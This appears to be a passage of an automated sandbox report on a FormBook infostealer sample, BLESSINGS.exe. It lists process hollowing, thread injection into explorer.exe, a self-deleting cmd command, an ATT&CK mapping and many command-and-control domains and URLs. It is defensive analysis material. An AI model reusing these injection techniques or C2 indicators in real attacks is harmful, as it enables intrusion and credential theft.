          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: D90000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: DAB008
          Source: C:\Users\user\Desktop\BLESSINGS.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\BLESSINGS.exeQueries volume information: C:\Users\user\Desktop\BLESSINGS.exe VolumeInformation
          Source: C:\Users\user\Desktop\BLESSINGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\BLESSINGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\BLESSINGS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection812Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Virtualization/Sandbox Evasion3Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection812LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339345 Sample: BLESSINGS.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 33 www.hotvidzhub.download 2->33 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 3 other signatures 2->45 11 BLESSINGS.exe 4 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 11->29 dropped 31 C:\Users\user\AppData\...\BLESSINGS.exe.log, ASCII 11->31 dropped 55 Writes to foreign memory regions 11->55 57 Allocates memory in foreign processes 11->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->59 61 Injects a PE file into a foreign processes 11->61 15 AddInProcess32.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 2 other signatures 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.quintred.com 91.195.241.137, 49755, 80 SEDO-ASDE Germany 18->35 37 www.toweroflifeinc.com 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 raserver.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          BLESSINGS.exe45%VirustotalBrowse
          BLESSINGS.exe15%ReversingLabs
          BLESSINGS.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          8.2.AddInProcess32.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.quintred.com4%VirustotalBrowse
          www.hotvidzhub.download0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.the343radio.com/jqc/0%Avira URL Cloudsafe
          http://www.droriginals.com0%Avira URL Cloudsafe
          http://www.novergi.com/jqc/0%Avira URL Cloudsafe
          http://www.the343radio.com0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.gabriellagullberg.comReferer:0%Avira URL Cloudsafe
          http://www.kornteengoods.com/jqc/0%Avira URL Cloudsafe
          http://www.screwtaped.comReferer:0%Avira URL Cloudsafe
          http://www.11sxsx.com/jqc/0%Avira URL Cloudsafe
          http://www.quintred.comReferer:0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.sterlworldshop.comReferer:0%Avira URL Cloudsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://www.margosbest.com/jqc/www.the343radio.com0%Avira URL Cloudsafe
          http://www.novergi.com0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.registeredagentfirm.comReferer:0%Avira URL Cloudsafe
          http://www.hotvidzhub.download/jqc/www.internetmarkaching.com0%Avira URL Cloudsafe
          http://www.internetmarkaching.com/jqc/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.quintred.com/jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.screwtaped.com/jqc/0%Avira URL Cloudsafe
          http://www.internetmarkaching.comReferer:0%Avira URL Cloudsafe
          http://www.novergi.com/jqc/www.hotvidzhub.download0%Avira URL Cloudsafe
          http://www.margosbest.com/jqc/0%Avira URL Cloudsafe
          http://www.novergi.comReferer:0%Avira URL Cloudsafe
          http://www.cositasdepachecos.comReferer:0%Avira URL Cloudsafe
          http://www.cositasdepachecos.com0%Avira URL Cloudsafe
          http://www.cositasdepachecos.com/jqc/www.margosbest.com0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.droriginals.com/jqc/www.kornteengoods.com0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.screwtaped.com0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.asacal.com/jqc/:0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.11sxsx.comReferer:0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.asacal.comReferer:0%Avira URL Cloudsafe
          http://www.11sxsx.com/jqc/www.sterlworldshop.com0%Avira URL Cloudsafe
          http://www.gabriellagullberg.com/jqc/www.cositasdepachecos.com0%Avira URL Cloudsafe
          http://www.hotvidzhub.downloadReferer:0%Avira URL Cloudsafe
          http://www.quintred.com/jqc/www.novergi.com0%Avira URL Cloudsafe
          http://www.kornteengoods.com/jqc/www.screwtaped.com0%Avira URL Cloudsafe
          http://www.internetmarkaching.com/jqc/www.gabriellagullberg.com0%Avira URL Cloudsafe
          http://www.toweroflifeinc.com/jqc/0%Avira URL Cloudsafe
          http://www.hotvidzhub.download0%Avira URL Cloudsafe
          http://www.gabriellagullberg.com/jqc/0%Avira URL Cloudsafe
          http://www.sterlworldshop.com/jqc/www.registeredagentfirm.com0%Avira URL Cloudsafe
          http://www.gabriellagullberg.com0%Avira URL Cloudsafe
          http://www.droriginals.comReferer:0%Avira URL Cloudsafe
          http://www.sterlworldshop.com/jqc/0%Avira URL Cloudsafe
          http://www.toweroflifeinc.comReferer:0%Avira URL Cloudsafe
          http://www.margosbest.com0%Avira URL Cloudsafe
          http://www.toweroflifeinc.com0%Avira URL Cloudsafe
          http://www.registeredagentfirm.com0%Avira URL Cloudsafe
          http://www.kornteengoods.com0%Avira URL Cloudsafe
          http://www.quintred.com0%Avira URL Cloudsafe
          http://www.cositasdepachecos.com/jqc/0%Avira URL Cloudsafe
          http://www.registeredagentfirm.com/jqc/www.asacal.com0%Avira URL Cloudsafe
          http://www.screwtaped.com/jqc/www.11sxsx.com0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sterlworldshop.com0%Avira URL Cloudsafe
          http://www.registeredagentfirm.com/jqc/0%Avira URL Cloudsafe
          http://www.toweroflifeinc.com/jqc/www.quintred.com0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.quintred.com
          		91.195.241.137
          		truetrueunknown
          www.toweroflifeinc.com
          		unknown
          		unknowntrue
            		unknown
            www.hotvidzhub.download
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.quintred.com/jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8Ptrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.the343radio.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.droriginals.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.novergi.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.fontbureau.com/designersGexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
              		high
              http://www.the343radio.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.fontbureau.com/designers/?explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                		high
                http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.gabriellagullberg.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.kornteengoods.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.screwtaped.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.11sxsx.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.fontbureau.com/designers?explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                  		high
                  http://www.quintred.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tiro.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.sterlworldshop.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designersexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    		high
                    http://ns.adobe.c/gBLESSINGS.exe, 00000001.00000003.420634051.00000000014F8000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.margosbest.com/jqc/www.the343radio.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.novergi.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.goodfont.co.krexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.registeredagentfirm.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.hotvidzhub.download/jqc/www.internetmarkaching.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.internetmarkaching.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.sajatypeworks.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://fontfabrik.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.screwtaped.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.internetmarkaching.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.novergi.com/jqc/www.hotvidzhub.downloadexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.margosbest.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.novergi.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.cositasdepachecos.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.cositasdepachecos.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.cositasdepachecos.com/jqc/www.margosbest.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.droriginals.com/jqc/www.kornteengoods.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fonts.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                      		high
                      http://www.sandoll.co.krexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.screwtaped.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.urwpp.deDPleaseexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.asacal.com/jqc/:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.zhongyicts.com.cnexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.11sxsx.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.sakkal.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.asacal.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.11sxsx.com/jqc/www.sterlworldshop.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.gabriellagullberg.com/jqc/www.cositasdepachecos.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmpfalse
                        		high
                        http://www.hotvidzhub.downloadReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.comexplorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpfalse
                            		high
                            http://www.quintred.com/jqc/www.novergi.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.kornteengoods.com/jqc/www.screwtaped.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.internetmarkaching.com/jqc/www.gabriellagullberg.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.toweroflifeinc.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.hotvidzhub.downloadexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.gabriellagullberg.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sterlworldshop.com/jqc/www.registeredagentfirm.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.gabriellagullberg.comexplorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.droriginals.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sterlworldshop.com/jqc/explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.toweroflifeinc.comReferer:explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
